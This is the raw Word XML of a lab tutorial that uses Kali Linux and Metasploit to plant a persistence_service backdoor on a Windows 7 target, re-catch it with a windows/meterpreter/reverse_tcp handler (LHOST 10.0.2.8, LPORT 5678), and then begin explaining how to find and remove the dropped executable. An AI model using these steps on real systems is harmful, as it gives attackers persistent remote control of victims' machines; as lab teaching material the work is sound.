          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002D6FB4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087855D9" w14:textId="24B9CCC4" w:rsidR="00CB5EDC" w:rsidRDefault="00CB5EDC" w:rsidP="00CB5EDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06F1380C" wp14:editId="0E5255B2">
            <wp:extent cx="5943600" cy="560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A42F" w14:textId="4DD755DE" w:rsid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>We next need to assign this exploit to our Meterpreter session 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59060CF9" w14:textId="7448B91B" w:rsidR="00CB5EDC" w:rsidRPr="00CB5EDC" w:rsidRDefault="00CB5EDC">
      <w:pPr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 xml:space="preserve">At the prompt, type, </w:t>
      </w:r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>set session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43862321" w14:textId="195B829D" w:rsid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 w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10DBC0CB" wp14:editId="597FDD59">
            <wp:extent cx="5229955" cy="619211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8E5C" w14:textId="5FA9F99A" w:rsid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>Set the LPORT to 5678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9700D" w14:textId="6118B927" w:rsidR="00CB5EDC" w:rsidRPr="00CB5EDC" w:rsidRDefault="00CB5EDC">
      <w:pPr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</w:pPr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 xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 5678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83F6E5" w14:textId="4C032E27" w:rsidR="00CB5EDC" w:rsidRP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 xml:space="preserve">Press </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FA44A" w14:textId="78B7D0A2" w:rsidR="006114B0" w:rsidRDefault="00CB5EDC">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="264DAB33" wp14:editId="0CAD8AF0">
            <wp:extent cx="5277587" cy="65731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C093" w14:textId="0B8ECE7B" w:rsidR="00CB5EDC" w:rsidRDefault="00CB5EDC">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">At the prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB5EDC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00940919" w14:textId="5F14616A" w:rsidR="00CB5EDC" w:rsidRDefault="00AC492F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3C73878A" wp14:editId="4320DEE9">
            <wp:extent cx="5943600" cy="1268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EE16" w14:textId="730EBAFC" w:rsidR="002D10F3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  <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0AF59" w14:textId="1B646A84" w:rsid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  <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5EB6B9" wp14:editId="1894B159">
            <wp:extent cx="4906060" cy="150516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12DB" w14:textId="7137C78F" w:rsidR="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart your Windows 7 target. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Your Meterpreter session is lost. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EFA141" w14:textId="6F51F6C7" w:rsidR="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42241910" wp14:editId="7DE257DF">
            <wp:extent cx="5839640" cy="32389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185F" w14:textId="054687DA" w:rsidR="00967000" w:rsidRDefault="0096700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Close </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Terminal. Log onto your Windows 7 target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB86EF" w14:textId="102E5395" w:rsidR="00967000" w:rsidRDefault="0096700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On your Kali machine, open a new terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4924B6" w14:textId="30E0956E" w:rsidR="00967000" w:rsidRDefault="0096700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Launch Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D15C20" w14:textId="7403C953" w:rsidR="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D5B587" wp14:editId="19A1ECBD">
            <wp:extent cx="4105848" cy="552527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7DF9" w14:textId="282059EE" w:rsidR="00967000" w:rsidRDefault="0096700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lastRenderedPageBreak/>
        <w:t xml:space="preserve">From your Metasploit console, launch a new Meterpreter session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26C2D1" w14:textId="559AF31B" w:rsid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Metasploit prompt, type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D3D35" w14:textId="357AAC9C" w:rsid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  <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C5136CB" wp14:editId="02B00349">
            <wp:extent cx="4353533" cy="64779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B324" w14:textId="4768266A" w:rsidR="00967000" w:rsidRDefault="00967000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At the prompt, type the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01968AA7" w14:textId="72588D1A" w:rsid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  <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A2A070B" w14:textId="2E8E1B97" w:rsid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  <w:r w:rsidRPr="00967000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63CB5881" wp14:editId="0B0F41FB">
            <wp:extent cx="5801535" cy="51442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480C" w14:textId="1EE93C98" w:rsidR="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set the LHOST using the IP address of your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C66783" w14:textId="78DB54C8" w:rsidR="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115080FC" w14:textId="779C0A88" w:rsidR="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="185AE8C0" wp14:editId="729FCD83">
            <wp:extent cx="3934374" cy="523948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EBA2" w14:textId="68317EFB" w:rsidR="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the listening </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 5678</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE14A49" w14:textId="795EDF1C" w:rsidR="00923D77" w:rsidRDefault="00923D77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="529BE489" wp14:editId="419B2ECA">
            <wp:extent cx="3667637" cy="64779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2C4F" w14:textId="4AD37035" w:rsidR="00923D77" w:rsidRDefault="00923D77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prompt, type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00923D77">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606648E6" w14:textId="1BB04195" w:rsidR="00923D77" w:rsidRDefault="00F207CA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We have reestablished our lost Meterpreter session using the persistent backdoor we created earlier at the Meterpreter prompt, type, and</w:t>
      </w:r>
      <w:r w:rsidR="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00923D77" w:rsidRPr="002D6FB4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00923D77">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31D37C" w14:textId="285BF421" w:rsidR="00024084" w:rsidRPr="002D6FB4" w:rsidRDefault="00923D77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625C9EFD" wp14:editId="7E96F2D4">
            <wp:extent cx="5943600" cy="19335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C39E6" w14:textId="2AA9FD9C" w:rsidR="00F5484C" w:rsidRDefault="002D6FB4" w:rsidP="00F5484C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szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">How the </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ackdoor works and how to </w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00024084">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emov</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00024084">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00F5484C" w:rsidRPr="00F5484C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="00F5484C" w:rsidRPr="00F5484C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>persistence_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F5484C" w:rsidRPr="00F5484C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F2A50" w14:textId="77777777" w:rsidR="00F207CA" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Take note of where the exploit was written to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A043E" w14:textId="4863F0F1" w:rsidR="00024084" w:rsidRDefault="00F207CA" w:rsidP="00024084">
      <w:pPr>
        <w:rPr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062438C7" wp14:editId="2363D80B">
            <wp:extent cx="5943600" cy="12680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183C3" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\expat\AppData\Local\Temp\MvGG.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F087D06" w14:textId="069B5877" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084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szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e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 w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden. To see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder, you first must enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Show hidden files, folders, and drives. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B116F7" w14:textId="460B6497" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On your </w:t>
      </w:r>
      <w:r w:rsidR="004C4E0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">indows 7 target, click start. Click on Control Panel. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Appearance and Personalization. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAB5A8" w14:textId="77777777" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084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399D546E" wp14:editId="04EFF2EA">
            <wp:extent cx="2144087" cy="1789611"/>
            <wp:effectExtent l="0" t="0" r="889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603" cy="182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C327" w14:textId="109D82CF" w:rsidR="00024084" w:rsidRDefault="00024084" w:rsidP="00024084">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC492F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On the next </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> click on Folder Options. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F66FD4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5B956654" wp14:editId="4CEC1F9F">
            <wp:extent cx="3980942" cy="1129937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205" cy="114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0EDA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On the Folder Options properties screen, click on the view tab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F9E2F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0BA9B72B" wp14:editId="74565B42">
            <wp:extent cx="3180806" cy="1080173"/>
            <wp:effectExtent l="0" t="0" r="63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57" cy="109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43483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On the view screen, click the radio button to Show hidden files, folders, and drives. Press OK. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DF4B5A" w14:textId="05AFEDCF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Next</w:t>
      </w:r>
      <w:r w:rsidR="00F207CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
